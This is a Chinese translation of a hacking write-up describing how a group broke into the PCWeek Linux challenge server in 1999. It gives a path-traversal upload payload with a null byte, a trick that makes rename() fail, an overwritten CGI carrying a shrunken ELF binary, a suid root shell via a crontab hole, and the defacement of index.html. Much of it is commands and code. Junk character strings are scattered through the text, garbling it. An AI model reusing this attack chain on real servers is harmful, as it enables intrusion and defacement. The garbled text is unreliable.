JFS侵入PCWEEK-LINUX主机的详细过程

译者注：PCWeek-Linux 主机是著名电脑杂志 PCWeek 为了测试 WEB 服务器 IIS（NT平台）
9 U- h1 B3 C2 I! ~# N和 Apache（Linux平台）的安全性，提供给黑客/骇客攻击的两台主机之一。另一台主机安装
的是 IIS（NT平台）。详细情况请访问网站：http://www.hackpcweek.com/。

) C9 u+ P0 h6 c% {4 q
# L8 _# y" G3 I- y% e# u首先要进行的当然是——收集远端主机信息：打开的端口和提供的网络服务等。经过扫
% G$ G' g+ V/ }' L! [8 m/ I描后发现大多数端口都被过滤掉了，原因可能是安装了防火墙或设置了 TCP-Wrapper 。所
以我们只能从 HTTP 服务器着手了。
8 s" G/ E, X) C8 \
lemming:~# telnet securelinux.hackpcweek.com 80
Trying 208.184.64.170...
. Z5 G$ l9 g) ]Connected to securelinux.hackpcweek.com.
Escape character is '^]'.
) _; T3 A( M  H' J- l* K* NPOST X HTTP/1.0
4 H2 p2 d" b8 ]
. D+ |" \  e: ^HTTP/1.1 400 Bad Request
Date: Fri, 24 Sep 1999 23:42:15 GMT
Server: Apache/1.3.6 (Unix) (Red Hat/Linux)
(...)
  {' O" b* B, WConnection closed by foreign host.
9 V. m6 L3 ?4 I8 b6 ilemming:~#

  U/ O9 _, w- n* r, K, r% M) b嗯，服务器操作系统是 Red Hat，WEB服务器是 Apache/1.3.6。从网页上可知服务器安
: b$ X% E; S& w5 h装了 mod_perl，但只有一个 fingerprint 功能，对我们没有什么用处。
Apache 1.3.6 本身没有包含任何可供远端用户使用的CGI程序，但我们不清楚Red Hat
的发行版本中是否有，所以我们进行了一些测试（test-cgi, wwwboard, count.cgi等）。
结果令人失望。于是我们尝试找出网站的结构。经过对该网站HTML页的分析，终于找出
0 `& y6 Y+ x' `: x2 U了网站DocumentRoot下的目录结构：

/
/cgi-bin
/photoads/
4 z  g" \5 o1 o/ T# t! S# E/photoads/cgi-bin

% P- |) ]- \! k+ z很自然地，我们的眼光落在 photoads 这个安装模块上。该商用CGI包可在"http://
www.hoffoce.com"找到，价格为$149，包括供检查和修改用的PERL源代码。
我们找到一个朋友，了解和掌握 photoads 在 Linux 平台上的安装情况，从而大致清楚
) d/ P: K5 u8 L. I2 j; q3 w运行在该主机上的 photoads。
! K  A& I: j: ]1 m0 p检查了缺省安装的文件后，我们发现可以取得所有用户名及其口令的数据库（http://
securelinux.hackpcweek.com/photoads/ads_data.pl），但当我们试图访问配置文件
/photoads/cgi-bin/photo_cfg.pl 时，服务器的设置拒绝了这个请求。
7 Z1 j5 M+ K7 Y. f. [. p通过 /photoads/cgi-bin/env.cgi，我们可以知道该服务器的许多详细情况，如
DocumentRoot 在文件系统的位置（/home/httpd/html），运行 Apache 服务器的用户（
8 Z' e* f. T' e- b# H+ G' E( anobody）等。
现在，开始寻找漏洞的第一步，我们尝试寻找是否存在 SSI 或 mod_perl 嵌入 HTML
命令的漏洞，如：
& o. U5 t) e$ [  S" @8 ?
( X! t9 l6 _% `5 z  \  s$ d<!--#include file="..."--> for SSI
; ^* T# w( B9 _& z, B<!--#perl ...--> for mod_perl

" \/ a; G* j  m: c& S5 o2 j+ A但脚本中的匹配表达式却在许多输入域上过滤此类输入。不过与此同时我们却发现有一
( U3 A0 n; r% m' s$ g2 N个用户赋值的变量在转换成 HTML 代码前，并没有检查其值的合法性。我们可以通过它将命
9 v6 u3 g3 A- c! M1 l* a. B% `令嵌入到由服务器端解析的 HTML 代码中：
6 M- n8 L3 \- k3 |; Y
! B, S9 X! u" _# v7 M在 post.cgi，行 36：
6 E! h7 `% Z, Tprint "you are trying to post an AD from another URL:<b> $ENV{'HTTP_REFERER'}\n";
  _* Q  E; |/ V! \# p
7 u. R/ m) M/ j3 n2 u; A1 ]$ENV{'HTTP_REFERER'}是一个用户赋值的变量，我们可以通过它将任何 HTML 嵌入到代
+ |! _8 t6 [% B* ~码中。
8 ]- X/ H) s$ O5 E请阅读我们提供的文件 getit.ssi 和 getit.mod_perl。
在命令行下使用这些文件如下：
" ?' W% s  w3 z0 a
& j4 \9 q/ p5 v. klemming:~# cat getit.ssi | nc securelinux.hackpcweek.com 80

但不幸的是，该主机的配置并不允许 SSI 或 mod_perl，所以我们无法利用这个方法侵
. L' `0 e6 G/ |1 R9 S入系统。
! V% z- V* f1 O3 ~6 p: N% a
& `" a  C! z7 A因此我们决定在CGI脚本中寻找缺口。在PERL脚本中许多漏洞往往出现在 open()、
system() 或 `` 等调用中，前一个允许读/写/执行，而后两个允许执行。
虽然在该主机找不到后两种调用，但我们却发现了一些 open() 调用：
7 o/ M) g: h3 O8 o
lemming:~/photoads/cgi-bin# grep 'open.*(.*)' *cgi | more

advisory.cgi: open (DATA, "$BaseDir/$DataFile");
: @& k8 s4 J) ]/ ?0 vedit.cgi: open (DATA, ">$BaseDir/$DataFile");
9 D. a7 a3 O7 M8 h8 Tedit.cgi: open(MAIL, "|$mailprog -t") || die "Can't open $mailprog!\n";
photo.cgi: open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
7 J5 W5 ^' t, l, s. }; k/ nphoto.cgi: open ( FILE, $filename );
2 W$ t/ o8 u; F1 k. }6 g( b(...)

7 \% h% G; |# Z1 l# H$BaseDir 和 $DataFile 两个变量是在配置文件中定义，且不能在运行时修改，无法被
我们利用。
但其余两个就……
3 L% o9 [  u6 u& q) {( L3 W7 f  N+ b
/ r1 r% v4 V! v( H4 n  h在 photo.cgi，行 132：
8 R* Y( J' ]$ f$write_file = $Upload_Dir.$filename;
) z5 _4 X7 B" }' \' R1 a
open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
print ULFD $UPLOAD{'FILE_CONTENT'};
! v% Q/ q1 c9 [3 m; Fclose(ULFD);
- W$ y' {" G2 j4 E1 y& h9 W  E, W& L
因此，如果我们可以修改 $write_file 变量，就可以写文件系统中的任何文件。
4 v6 G( d  U( W+ ~$ v! Y$write_file 变量来自：
3 C6 f  a, D! w( V6 O" p
/ W5 U, O* W; L: ^0 B# L# G$write_file = $Upload_Dir.$filename;

6 R( r2 W" j+ h3 t" e' K其中，$Upload_Dir 在配置文件中定义，我们无法修改，但 $filename 变量又如何呢？

" y# a* J( u! M4 x+ O% I在 photo.cgi，行 226：
if( !$UPLOAD{'FILE_NAME'} ) { show_file_not_found(); }

4 M+ A# U8 h5 e1 N% W$filename = lc($UPLOAD{'FILE_NAME'});
$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;
& t5 }, [$ x2 o! Q* z5 Z
if ($filename =~ m/gif/) {
$type = '.gif';
0 a7 q  W- K! q1 }( d% F}elsif ($filename =~ m/jpg/) {
" e% M( g& z! }8 _3 x* L$type = '.jpg';
}else{
{&Not_Valid_Image}
1 `0 ?# A7 c3 g2 T}
" o+ \( [; g* ?# k1 T
由此可知，该变量来自从提交表格的变量组分解出来的 $UPLOAD{'FILE_NAME'}，而且必
须经过匹配表达式过滤，因此我们不能用"../../../../../../../../etc/passwd"格式来取
得任何文件。匹配表达式为：
% C+ H" x2 ]9 O
* |7 a2 g4 T$ u$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;

我们看到，如 $filename 与该表达式匹配，则返回ASCII码1（SOH）。同时，变量还必
) n; Z- M1 w* d7 y+ t3 A须包含"gif"或"jpg"，以通过 Not_Valid_Image 过滤器。
+ A2 v% g& `6 x9 u1 r经过多次尝试，以及从 Phrack 的关于PERL CGI安全性文章的帮助，我们发现以下格式
& l- T( A( h0 }% A3 Q* o) F
/jfs/\../../../../../../../export/www/htdocs/index.html%00.gif
. F8 @' c% K: Y, c4 ?6 N( x  V
可以成功修改WEB服务器根目录下的index.html文件。:-)
' ~- K3 J9 R8 W, ]9 @5 k然而，为了上载文件，我们仍须绕过更多的脚本代码。我们发现无法通过POST方法发送
包含上述内容的表格（无法转换%00），唯一的方法只能是GET。
在 photo.cgi ，行 256，会检查被上载文件的内容是否符合图像定义（宽/长/大小）
1 I9 l7 u) C/ A) \7 t（记住，photo.cgi 是被当作某个AD上载图像的一个方法）。如果不符合这些细节，脚本将
& V9 M2 |/ C7 C- M删除该上载文件。这当然不是我们所希望的！
PCWeek 网站配置文件将 Imagesize 设为 0，所以我们可以忽略该脚本中有关JPG部分，
: C6 G% r7 D) L" C8 \4 Z- G而将主要精力集中在GIF上。

. K7 [  W1 h/ m* Cif ( substr ( $filename, -4, 4 ) eq ".gif" ) {
open ( FILE, $filename );
  q4 w9 k; n- U7 b; {# F3 D' k) rmy $head;
, t; _3 L2 q9 f) z! N! Amy $gHeadFmt = "A6vvb8CC";
my $pictDescFmt = "vvvvb8";
read FILE, $head, 13;
(my $GIF8xa, $width, $height, my $resFlags, my $bgColor, my $w2h) = unpack $gHeadFmt, $head;
" b* u" V) n& H! Qclose FILE;
6 y# E8 G  ], L* J4 a$PhotoWidth = $width;
. B* ]+ }+ `& C0 o, r" y1 f: S& i$PhotoHeight = $height;
$PhotoSize = $size;
" e3 L0 P8 `! O3 F0 Oreturn;
}

在 photo.cgi，行 140：

; {; Y! S6 K7 m; P4 K3 Q% _if (($PhotoWidth eq "") || ($PhotoWidth > '700')) {
2 L8 }/ b! L0 Q{&Not_Valid_Image}
}
$ Z5 w. w* H* R5 A8 E; h, U
if ($PhotoWidth > $ImgWidth || $PhotoHeight > $ImgHeight) {
{&Height_Width}
7 @  p7 s9 }" f, k1 |2 `}
9 A$ x1 K( l: y% O1 U; Z0 |
- O( |, h# ?7 m) {* }4 J" q6 N2 V2 q由上可知，$PhotoWidth不能大于700，不能为空，且不能大于 $ImgWidth（缺省为350）
。
9 B9 H# q9 z* f; J2 u所以我们使 $PhotoWidth!="" 且 $Photowidth<350 即可。
对于 $PhotoHeight，则必须小于 $ImgHeight（缺省为250）。
4 @; P( j6 g) h, X: `# W% a* {综合以上要求，我们可以得到一个可以使用的数据：$PhotoWidth==$PhotoHeight==0。
研究提取该值的脚本后，我们唯一要做的就是将文件的第6至第9字节的值置为 ASCII 码 0
+ F. w6 z  b1 g& X5 \! g（NUL）。
! q: B8 P/ l7 {# u9 f在确保 FILE_CONTENT（文件内容）符合以上所有要求后，我们又在以下代码遇到了另一
个问题：

chmod 0755, $Upload_Dir.$filename;
$newname = $AdNum;
rename("$write_file", "$Upload_Dir/$newname");
9 R8 Q8 p; R3 `- T: x
' {$ a+ k8 R5 B- MShow_Upload_Success($write_file);

7 r# {$ ^6 }$ ]* ]# @哇！文件将被改名/移动（这可是我们绝对不希望的！）。
+ L" ]* k! |' t' ^7 O6 z查找 $AdNum 变量的最终处理过程，我们发现它只能包含数字：
2 [! B, H; J0 l. Q6 ^+ q: m
$UPLOAD{'AdNum'} =~ tr/0-9//cd;
$UPLOAD{'Password'} =~ tr/a-zA-Z0-9!+&#%$@*//cd;
; C8 o/ K, C' J9 h8 S$AdNum = $UPLOAD{'AdNum'};

$ W  q. N) }9 [& v' S4 r其余的字符将被删除。因此我们不能直接应用"../../../"这种方法。
$ a# ~# u) r, A4 w那么，应该怎样做呢？我们看到 rename() 函数需要两个参数：旧的路径和新的路径。
哈哈，在函数过程中没有错误检查！当函数出错后将跳到下一行继续执行！那么如何才能使
该函数失败呢？Linux 内核对文件名长度限制为1024字节。因此如能使脚本将文件改名时新
文件名超过1024字节长，即可绕过这个过滤器。
- ?$ v% a, S: M$ `: n" k+ P所以，下一步就是要向系统传递一个大约1024字节长的AD号码。但由于脚本仅允许我们
7 g  [' \" [6 z; O* |9 F发送对应AD号码已存在的图片，而且由系统产生一个10^1024（10的1024次幂，即小数点前有
1024个数字——backend注）的AD号码要花的时间对我们来说似乎太长了。;-)
我们又遇到另一个难题了！……
) g. A) x+ j$ U7 m4 M
$ u3 ~0 S3 A' o4 K5 c( Q1 I5 {我们发现输入错误检查函数可以帮助我们创建一个指定的AD号码！浏览 edit.cgi 脚本
% W7 J' \- P$ w/ H% J. N后，你也许就会想到：如果输入是一个文件名+回车符+一个1024位的数字，会产生什么结果
1 ?2 C0 Z  {3 w# F+ P6 i6 F呢？;-)
' e: L% G2 g5 X2 V& ^请阅读用于创建新AD值的程序文件 long.adnum。
当成功绕过 $AdNum 的检查后，我们就可以让脚本创建/覆盖用户 nobody 有权写的任何
' z! A2 C. n; f6 B  J* \. I0 W3 Z3 O文件，其中包含了我们所希望的东西（GIF头部的NUL除外）。
. l. |% x4 U" J7 P7 d9 d
1 E0 S8 a. }* c* n! m- ~. E现在就让我们对该主机试一试这个方法。
嗯，so far so good（一切顺利）。但当我们试图让脚本改写 index.html 文件时无法
成功。:( 其中的原因可能是没有覆盖该文件的权限（该文件由root拥有）。

" [( K# r  `# w* ~8 ]. ~
让我们试一下是否还有其它入侵方法……
1 _$ D4 m9 N5 y
我们决定尝试修改CGI程序，以使其按我们的意愿运行:)。这种方法还可以让我们搜寻那
些“绝密”文件，然后拿出动卖。:)
我们修改了“覆盖”脚本，并让其成功地覆盖了一个CGI！:) 为了不覆盖那些较为重要
的CGI（这是提高隐蔽性的聪明法子——backend注），最后我们选择了 advisory.cgi（你知
, R& n  L& D" a% ^( D道它有什么用吗？:)）
( c9 p* T- j0 |$ M& d* Q. W现在，我们将要上载一个shell脚本，以便我们可以执行一些命令。呵呵
" U' M! J; c2 z' j3 E然而，这个以CGI方式运行的shell脚本必须符合以下格式：
/ U0 V7 l0 t  [7 s. x  a- ~! j
#!/bin/sh
, Z0 h* _' w) g/ Vecho "Content-type: text/html"
find / "*secret*" -print

同时要记得，第6至第9字节必须为0或很小的值，以符合上面提及的大小定义……
$ T. I( M& @0 J/ R1 @
* S* \$ F- I; J& L#!/bi\00\00\00\00n/sh
& M. W5 Z6 U7 R5 _3 w
( \" {) @( U- w" K9 ]  Y以上这种方法是行不通的，内核只会读取前5个字节（#!/bi）内容并执行。在该主机中
7 c3 n# j% b1 ?! Y/ S- U我们无法只用三个字节去获得一个shell。又遇到难题了！:(

6 e! }' l5 O  s% j让我们看一下ELF（Linux缺省可执行类型）二进制文件格式，就会发现那些位置字节的
内容均为0x00。:) Yohoo :)
3 \% S# j! T$ g- w解决了这个问题后，现在我们需要将这个ELF可执行文件上载到远端服务器中。注意，文
( @1 D+ V; G$ l9 H) G件内容必须经过编码，因为我们已知道只能通过GET方法上载，而不是POST。因此还要考虑到
# c6 H7 {9 k' S8 rURI的最大长度。Apache 服务器上URI最大长度设为8190字节。别忘了，我们还有一个很长的
1024字节的AD号码，所以经编码后的ELF文件长度限制为大约7000字节。
( E2 w( u9 e1 R4 B( z! l" J5 j
以下这个程序：

$ z3 B6 Q( R. M# Y7 Ylemming:~/pcweek/hack/POST# cat fin.c
) X5 k: d/ L5 O3 X# A" M#include <stdio.h>
main()
/ k* q* ~0 t7 R+ p{
printf("Content-type: text/html\n\n\r");
fflush(stdout);
execlp("/usr/bin/find","find","/",0);
}
, H4 d* b+ G1 g
1 h! S" C; ~6 B7 W0 F; {9 [编译后：
* _- F6 r, ~5 j, t0 @- B% S6 Y
' N2 h( t' p% k; m4 {lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 4280 Sep 25 04:18 fin*
; k6 x  H  m) b7 L, R
优化（清除symbols）后：
- R# @" V3 I2 z# W2 N
( {1 _- d/ j$ y0 Ilemming:~/pcweek/hack/POST# strip fin
lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 2812 Sep 25 04:18 fin*
lemming:~/pcweek/hack/POST#

URL编码后：
5 ?- Y* \7 U: w( n: K* e, E8 g3 L
3 H" Y) ~- |4 c. Plemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
, }/ @. b& e. e$ [' c' e' G  U-rw-r--r-- 1 root root 7602 Sep 25 04:20 fin.url

这个文件大小超过了限制值。:(
0 J+ B* X4 Y/ v: m4 a我们只能自行编辑二进制文件以尽量减小文件体积。这可不是一件轻松的工作，但却有
6 }5 q7 g& [9 i/ h  }( m. E. J效：

lemming:~/pcweek/hack/POST# joe fin
lemming:~/pcweek/hack/POST# ls -l fin
% P1 ?2 d/ _5 T9 S-rwxr-xr-x 1 root root 1693 Sep 25 04:22 fin*
6 Y, o6 N) f# Q% Plemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
-rw-r--r-- 1 root root 4535 Sep 25 04:22 fin.url
& G% L* R' \8 u8 t  alemming:~/pcweek/hack/POST#

请阅读 get.sec.find文件，还有 to_url 脚本和用来运行一些基本命令的*.c文件。
" s3 k# I1 D. o4 X/ E6 @# t4 K3 ~" L1 Y
. e" J- d# t1 c( X# J* @* m现在，将这个CGI上载到服务器，再用浏览器访问它，如：

wget http://securelinux.hackpcweek.com/photoads/cgi-bin/advisory.cgi
! Z: ^! K, f, x% P! s
服务器返回的结果相当于在服务器上执行 find / 命令。:)
但我们在该服务器中找不到任何“绝密”文件，或许是nobody用户无权访问的缘故。:(
我们尝试了更多的命令搜索，如ls等，但仍无法找到它们的踪影。
3 z( P; G  _6 S9 y1 E[我怀疑这些文件是否真的保存在该服务器上！]
4 {0 V3 C* x. {- \

: {( L* i# I, O" A好了，现在是获取 root 权限的时候了。利用最新发现的 Red Hat crontab 漏洞就可以
轻松做到这一点。该漏洞详情请参阅 Bugtraq 或 securityfocus 上相关文档。
( ?' N+ F+ i; l& `. g( p9 o% h: ^# I我们修改了源程序以适应自己的需要，因为我们不需交互式 root shell，而是创建一个
) ]+ w) G: \2 \" ]. x9 z8 p用户 nobody 可访问的 suid root shell，如 /tmp/.bs。我们再次上载该CGI，并运行它，
9 j% k$ M, `4 _6 k  T观察其运行结果。
9 T3 O' C, R" q/ ]0 Q我们制作了执行"ls /tmp"命令的CGI，执行后确认我们已拥有了一个 suid root shell。
9 d# b' p, ^! Q/ @- x  b5 F' }另外，我们还上载了一个文件 /tmp/xx，用于修改 index.html 文件。
$ o! f6 @8 e/ B  m9 d* _5 @, v
  W: O7 W' b4 a' L" a  C' O9 |' rexeclp("/tmp/.bs","ls","-c","cp /tmp/xx /home/httpd/html/index.html",0);
3 \: d: E. \1 d4 ?% o" t
好了。游戏结束！:)
+ J( L9 }/ D0 |: _+ y. u/ V总共花费了大约20个小时，还算不错！呵呵。:)
; j" Q4 u" X4 J
6 Y* x' s; P/ L- L& Y